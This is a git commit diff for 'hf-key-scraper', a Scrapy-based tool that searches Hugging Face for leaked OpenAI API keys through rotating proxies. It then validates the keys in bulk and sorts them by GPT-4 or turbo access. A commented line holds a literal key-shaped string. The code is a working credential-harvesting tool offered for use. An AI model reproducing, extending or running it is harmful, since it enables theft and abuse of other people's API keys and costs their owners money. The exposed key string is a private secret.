final commit

This commit is contained in:
Cyberes 2023-10-20 18:54:11 -06:00
parent 15759586e4
commit c13c224b36
6 changed files with 27 additions and 20 deletions

2
.gitignore vendored
View File

@ -1,4 +1,6 @@
.idea .idea
found-keys*.txt
# ---> Python # ---> Python
# Byte-compiled / optimized / DLL files # Byte-compiled / optimized / DLL files

View File

@ -1,3 +1,5 @@
# hf-key-scraper # hf-key-scraper
Scrape for OpenAI keys on Hugging Face Scrape for OpenAI keys on Hugging Face.
This requires at least one Squid proxy to function. Define your proxies in `settings.py` -> `PROXIES`.

View File

@ -1,8 +1,9 @@
import argparse import argparse
import concurrent
from concurrent.futures import ThreadPoolExecutor from concurrent.futures import ThreadPoolExecutor
from pathlib import Path from pathlib import Path
from tqdm import tqdm
from keychecker.check import check_key from keychecker.check import check_key
@ -17,26 +18,29 @@ def process_key(key):
def main(): def main():
parser = argparse.ArgumentParser(description='Scrape data from chub.ai.') parser = argparse.ArgumentParser(description='Scrape data from chub.ai.')
parser.add_argument('input_file', help='Path to the file containing the keys.') parser.add_argument('input_file', nargs='*', help='Path to the file containing the keys.')
args = parser.parse_args() args = parser.parse_args()
input_file = Path(args.input_file).resolve().absolute() keys = set()
for file in args.input_file:
input_file = Path(file).resolve().expanduser().absolute()
if not input_file.exists(): if not input_file.exists():
print('Input file does not exist:', input_file) print('Input file does not exist:', input_file)
quit(1) quit(1)
data = set(input_file.read_text().splitlines())
with open(input_file) as f: keys = keys | data
content = set(f.read().splitlines())
# content = ['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'] # content = ['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']
print('Checking', len(keys), 'keys...')
gpt_4 = set() gpt_4 = set()
gpt_4_32k = set() gpt_4_32k = set()
gpt_3 = set() gpt_3 = set()
pbar = tqdm(total=len(keys))
with ThreadPoolExecutor(max_workers=50) as executor: with ThreadPoolExecutor(max_workers=50) as executor:
results = executor.map(process_key, content) results = executor.map(process_key, keys)
for result in results: for result in results:
if result is not None: if result is not None:
if result['has_gpt_4']: if result['has_gpt_4']:
@ -45,6 +49,8 @@ def main():
gpt_4_32k.add(result['api_key']) gpt_4_32k.add(result['api_key'])
if result['has_only_turbo']: if result['has_only_turbo']:
gpt_3.add(result['api_key']) gpt_3.add(result['api_key'])
pbar.update(1)
pbar.close()
print('') print('')
print('GPT4 KEYS:') print('GPT4 KEYS:')

View File

@ -92,10 +92,7 @@ TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
FEED_EXPORT_ENCODING = "utf-8" FEED_EXPORT_ENCODING = "utf-8"
PROXIES = [ PROXIES = [
"http://172.0.4.7:3128", "http://127.0.0.1:3128"
"http://172.0.4.8:3128",
"http://172.0.4.10:3128",
"http://172.0.4.12:3128",
] ]
LOG_LEVEL = 'CRITICAL' LOG_LEVEL = 'CRITICAL'

View File

@ -31,5 +31,5 @@ class HuggingfaceSpider(CrawlSpider):
text = response.text text = response.text
matches = self.regex.findall(text) matches = self.regex.findall(text)
if matches: if matches:
self.logger.error(f"{matches}") self.logger.debug(f"{matches}")
return FoundItem(url=response.url, matches=matches) return FoundItem(url=response.url, matches=matches)

View File

@ -4,14 +4,14 @@ import time
import coloredlogs import coloredlogs
import scrapy import scrapy
from string import ascii_lowercase, ascii_uppercase
from ..pipelines import FoundItem from ..pipelines import FoundItem
class HFSearchSpider(scrapy.Spider): class HFSearchSpider(scrapy.Spider):
name = "huggingface_search" name = "huggingface_search"
allowed_domains = ["huggingface.co"] allowed_domains = ["huggingface.co"]
start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)] start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in [*ascii_lowercase, *ascii_uppercase, *range(10), 'etk', 'ant'] for j in range(10)]
logger = logging.getLogger('HFSearchSpider') logger = logging.getLogger('HFSearchSpider')
logger.setLevel(logging.DEBUG) logger.setLevel(logging.DEBUG)
coloredlogs.install(logger=logger, level=logging.DEBUG) coloredlogs.install(logger=logger, level=logging.DEBUG)
@ -27,5 +27,5 @@ class HFSearchSpider(scrapy.Spider):
for key in keys: for key in keys:
found_keys.add(''.join(key)) found_keys.add(''.join(key))
if len(found_keys): if len(found_keys):
self.logger.error(f"{found_keys}") self.logger.debug(f"{found_keys}")
yield FoundItem(url=response.url, matches=found_keys) yield FoundItem(url=response.url, matches=found_keys)